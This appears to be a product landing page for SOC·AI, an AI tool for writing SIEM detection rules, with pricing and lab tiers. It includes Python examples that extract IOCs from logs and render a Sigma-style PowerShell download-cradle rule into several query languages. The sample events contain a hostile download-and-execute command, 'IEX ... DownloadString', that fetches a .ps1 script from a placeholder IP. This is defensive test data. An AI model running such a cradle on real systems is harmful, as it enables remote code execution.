AI-POWERED DETECTION ENGINEERING

Write detection rules
across 5 SIEM platforms
in seconds.

Sigma · Splunk SPL · Elastic KQL · Sentinel KQL · Wazuh XML
55 hands-on lab scenarios mapping the full MITRE ATT&CK kill chain.

AGENTIC AI THREAT ALERT — AI agents can now exploit vulnerabilities faster than defenders can patch them. Train on 5 new AI-attack scenarios →
48% say #1 risk · 5 SIEM platforms · 55 lab scenarios · 6 AI modules · $0 to start
[Screenshot: soc-ai — Detection Engineer Module]

Six specialized AI modules.
One unified workflow.

Each module is purpose-built with domain-specific system prompts referencing real-world 2025–2026 threat intelligence.

Detection Engineer

Generate Sigma, Splunk SPL, Elastic KQL, Sentinel KQL, and Wazuh XML rules from natural language threat descriptions.

CORE

Vulnerability Analyzer

Assess CVEs, map attack surfaces, and generate remediation playbooks with CVSS scoring and exploit analysis.

ANALYSIS

Incident Responder

Build IR playbooks, containment checklists, and forensic analysis workflows for active incidents.

RESPONSE

Log Parser

Paste raw logs — Windows Event, Syslog, firewall, proxy — and get instant IOC extraction and anomaly detection.

FORENSICS

SIEM Translator

Convert detection rules between any two SIEM platforms instantly. Sigma ↔ Splunk ↔ Elastic ↔ Sentinel ↔ Wazuh.

CONVERT

Learn Mode

Interactive cybersecurity tutor covering MITRE ATT&CK, threat hunting, detection logic, and SOC workflows.

EDUCATION
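What the Log Parser's IOC extraction step amounts to, as an added example that is not SOC·AI's code: refang defanged indicators, pull IPv4 addresses, domains, URLs and file hashes out of pasted syslog, proxy and Windows event text, split internal from external addresses, and count failed SSH logins per source. The sample lines are constructed, and the list of internal address ranges is an assumption to adjust to your own address plan.

```python
"""Extract IOCs from pasted raw log lines: refang, pull IPv4/domain/URL/hash
indicators, split internal from external addresses, and count failed SSH logins.
Illustrative code, not SOC·AI's Log Parser."""
import ipaddress
import re
from collections import Counter

# Constructed sample lines (syslog, proxy access log, Windows event as key=value),
# not real telemetry. 198.51.100.0/24 and .invalid are reserved for documentation.
SAMPLE_LOGS = """\
Mar 14 09:12:07 web01 sshd[2231]: Failed password for root from 198.51.100.23 port 51122 ssh2
1710407530.112 443 10.0.4.15 TCP_MISS/200 8812 GET hxxp://update.cdn-mirror[.]invalid/a.ps1 - DIRECT/198.51.100.7
EventID=4688 NewProcessName=C:\\Windows\\Temp\\svchost32.exe Hashes=SHA256=9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
Mar 14 09:12:09 web01 sshd[2231]: Accepted publickey for deploy from 10.0.0.5 port 40022 ssh2
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"\bhttps?://[^\s\"'<>]+", re.IGNORECASE)
DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
HASHES = {"md5": re.compile(r"\b[0-9a-f]{32}\b", re.IGNORECASE),
          "sha1": re.compile(r"\b[0-9a-f]{40}\b", re.IGNORECASE),
          "sha256": re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE)}
FAILED_SSH = re.compile(r"Failed password for \S+ from (\d{1,3}(?:\.\d{1,3}){3})")
# Dotted tokens that look like domains but are file names.
FILE_EXTENSIONS = {"exe", "dll", "ps1", "bat", "vbs", "js", "txt", "log", "zip"}
# Assumption: RFC 1918, loopback and link-local count as internal. ipaddress.is_private
# is deliberately not used: it also flags documentation ranges such as 198.51.100.0/24.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def refang(text):
    """Undo common defanging so indicators can be matched and pivoted on."""
    text = re.sub(r"hxxp", "http", text, flags=re.IGNORECASE)
    return text.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")

def is_internal(ip):
    return any(ipaddress.ip_address(ip) in net for net in INTERNAL)

def extract_iocs(raw):
    text = refang(raw)
    ips = set()
    for candidate in IPV4.findall(text):
        try:
            ipaddress.ip_address(candidate)  # drops 999.1.1.1-style false positives
        except ValueError:
            continue
        ips.add(candidate)
    domains = {d.lower() for d in DOMAIN.findall(text)
               if d.rsplit(".", 1)[1].lower() not in FILE_EXTENSIONS}
    hashes = {algo: sorted({h.lower() for h in pat.findall(text)}) for algo, pat in HASHES.items()}
    return {
        "external_ips": sorted(ip for ip in ips if not is_internal(ip)),
        "internal_ips": sorted(ip for ip in ips if is_internal(ip)),
        "domains": sorted(domains),
        "urls": sorted(u.rstrip(".,;)") for u in URL.findall(text)),
        "hashes": {algo: digests for algo, digests in hashes.items() if digests},
        "failed_ssh_logins": dict(Counter(FAILED_SSH.findall(text))),
    }

if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_LOGS).items():
        print(f"{kind}: {values}")
```

The word-boundary anchors on the hash patterns are what stop a SHA-256 from also being reported as an MD5 and a SHA-1 (its 32- and 40-character prefixes), and the extension deny-list is what keeps `svchost32.exe` out of the domain list; both are the kind of silent false positive an extractor produces when it is just a bag of regexes.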
// Platforms

One prompt. Five outputs.

Describe a threat in plain English and get candidate detection rules for each supported SIEM, ready to validate against your own logs. Note that the two KQLs are different languages despite the shared acronym: Elastic KQL is Kibana Query Language, Sentinel KQL is Kusto Query Language.

Sigma
Splunk SPL
Elastic KQL
Sentinel KQL
Wazuh XML

55 scenarios.
Real threats.
Real logs.

Practice detection engineering against scenarios that map the full MITRE ATT&CK kill chain, from initial access to exfiltration, including a 2026-current AI deepfake vishing campaign.

15 Free scenarios · 19 Intermediate · 16 Advanced

Tier   Scenario                                   ATT&CK
FREE   Phishing Email — Macro-Enabled Payload     T1566.001
FREE   Brute Force — RDP Login Attempt            T1110.001
FREE   PowerShell Download Cradle                 T1059.001
PRO    Kerberoasting via SPN Request              T1558.003
PRO    AI Deepfake Vishing Campaign               T1598.004
PRO    Supply Chain — Compromised NPM Package     T1195.002
+ 44 more scenarios across all difficulty tiers
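The PowerShell Download Cradle scenario in the list above (T1059.001), worked through as an added example that is not the page's or SOC·AI's own code, and covering both the SIEM Translator and the "one prompt, five outputs" claim: a Sigma-style rule is evaluated against three constructed 4104 script-block events and then rendered into Splunk SPL, Elastic KQL and Sentinel KQL. Wazuh XML is left out, since a Wazuh rule is a structured XML document rather than a query. The rule itself, the per-platform query prefixes and field names, and the sample events are all assumptions made for this example.

```python
"""Sigma-style rule for the PowerShell Download Cradle scenario: evaluate it against
constructed events, then render it as Splunk SPL, Elastic KQL and Sentinel KQL.
Illustrative code, not SOC·AI's generator or translator."""
from functools import reduce

# Constructed rule (an assumption for this example, not product output). Sigma semantics:
# fields within one selection AND together; a list of values is OR unless |all is present.
RULE = {
    "title": "PowerShell Download Cradle",
    "tags": ["attack.execution", "attack.t1059.001"],
    "logsource": {"product": "windows", "category": "ps_script"},
    "detection": {
        "download": {"ScriptBlockText|contains|all": ["Net.WebClient", "DownloadString"]},
        "execute": {"ScriptBlockText|contains": ["IEX", "Invoke-Expression"]},
        "condition": "download and execute",
    },
}

# Assumed per-platform rendering: query prefix for the logsource, field-name map, and the
# substring-match syntax. Real deployments need their own field maps; a Sentinel Event row,
# for one, only has a ScriptBlockText column once the 4104 EventData has been parsed.
DIALECTS = {
    "splunk": {"prefix": "index=windows EventCode=4104 ", "field": {},
               "contains": lambda f, v: f'{f}="*{v}*"', "and": " AND ", "or": " OR "},
    "elastic": {"prefix": "event.code:4104 and ",
                "field": {"ScriptBlockText": "powershell.file.script_block_text"},
                "contains": lambda f, v: f"{f}:*{v}*", "and": " and ", "or": " or "},
    "sentinel": {"prefix": "Event | where EventID == 4104 | where ", "field": {},
                 "contains": lambda f, v: f'{f} contains "{v}"', "and": " and ", "or": " or "},
}

def _parse_key(key):
    """'Field|contains|all' -> ('Field', True). Only the contains modifier is supported here."""
    parts = key.split("|")
    if len(parts) < 2 or parts[1] != "contains":
        raise ValueError(f"unsupported field modifier in {key!r}")
    return parts[0], "all" in parts[2:]

def _values(v):
    return v if isinstance(v, list) else [v]

def _walk(condition, atom, and_, or_):
    """Fold an 'a and b or c'-style condition (and binds tighter than or; no parentheses or
    'not', unlike full Sigma). atom(name) supplies a selection's value, so the same walker
    yields booleans when evaluating a rule and query text when rendering it."""
    return reduce(or_, (reduce(and_, map(atom, term.split(" and ")))
                        for term in condition.split(" or ")))

def selection_matches(selection, event):
    """Case-insensitive evaluation of one selection map against a flat event dict."""
    for key, values in selection.items():
        field, require_all = _parse_key(key)
        actual = str(event.get(field, "")).lower()
        hits = [str(v).lower() in actual for v in _values(values)]
        if not (all(hits) if require_all else any(hits)):
            return False
    return True

def rule_matches(rule, event):
    det = rule["detection"]
    return _walk(det["condition"], lambda name: selection_matches(det[name], event),
                 lambda a, b: a and b, lambda a, b: a or b)

def render(rule, dialect):
    """Render the rule's detection section in one target query language."""
    d, det = DIALECTS[dialect], rule["detection"]

    def clause(name):
        parts = []
        for key, values in det[name].items():
            field, require_all = _parse_key(key)
            terms = [d["contains"](d["field"].get(field, field), v) for v in _values(values)]
            joiner = d["and"] if require_all else d["or"]
            parts.append(terms[0] if len(terms) == 1 else "(" + joiner.join(terms) + ")")
        return parts[0] if len(parts) == 1 else "(" + d["and"].join(parts) + ")"

    return d["prefix"] + _walk(det["condition"], clause,
                               lambda a, b: f"({a}{d['and']}{b})", lambda a, b: f"({a}{d['or']}{b})")

# Constructed 4104 script-block events, not real telemetry. The second downloads without an
# inline execution verb, so this rule, as written, does not fire on it.
EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "(New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
]

def matching_events(rule=RULE, events=EVENTS):
    return [e["ScriptBlockText"] for e in events if rule_matches(rule, e)]

if __name__ == "__main__":
    for platform in DIALECTS:
        print(f"[{platform}] {render(RULE, platform)}")
    print("fired on:", matching_events())
```

Two things the translation makes visible. The field map is where fidelity is lost: `powershell.file.script_block_text` is the Elastic ECS name, while a Sentinel `Event` row only carries `ScriptBlockText` as a column after the EventData has been parsed, and a converter that does not know that emits a query that parses fine and never matches. The rule's own logic also has a deliberate blind spot: the second sample event fetches the payload without an inline `IEX`, so it does not fire. A generated rule is a starting point to test against your own logs, not a finished detection.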

Layer it on top of what
you already use.

SOC·AI isn't replacing your training platform. It's the AI study partner that makes everything else click faster.

Feature                           LetsDefend    TryHackMe    SOC·AI
AI-powered rule generation
Multi-SIEM output (5 platforms)
Hands-on lab scenarios                                       ✓ 55
Real-time log analysis
SIEM rule translation
Free tier                         Limited       Limited      5 queries/day
Monthly price                     $39/mo        $14/mo       $29/mo

Start free. Upgrade when
you need unlimited.

No credit card required. 5 free queries every day — enough to experience the power of AI-driven detection engineering.

Free
$0

Start building detection skills today. Free account required.

  • 5 queries per day
  • All 6 AI modules
  • 15 Beginner lab scenarios
  • 5 SIEM platform outputs
START FREE →
Student
$14/mo

Full Pro access at a student-friendly price. Verify with .edu email.

  • Everything in Pro
  • All 55 lab scenarios
  • .edu email verification
  • Build your detection portfolio
STUDENT ACCESS →

Analysts who write
their own detection rules
advance faster.

Stop copy-pasting rules you don't understand. Start engineering detections that actually catch threats.

CREATE YOUR ACCOUNT — IT'S FREE →

No credit card · 5 queries/day · Cancel anytime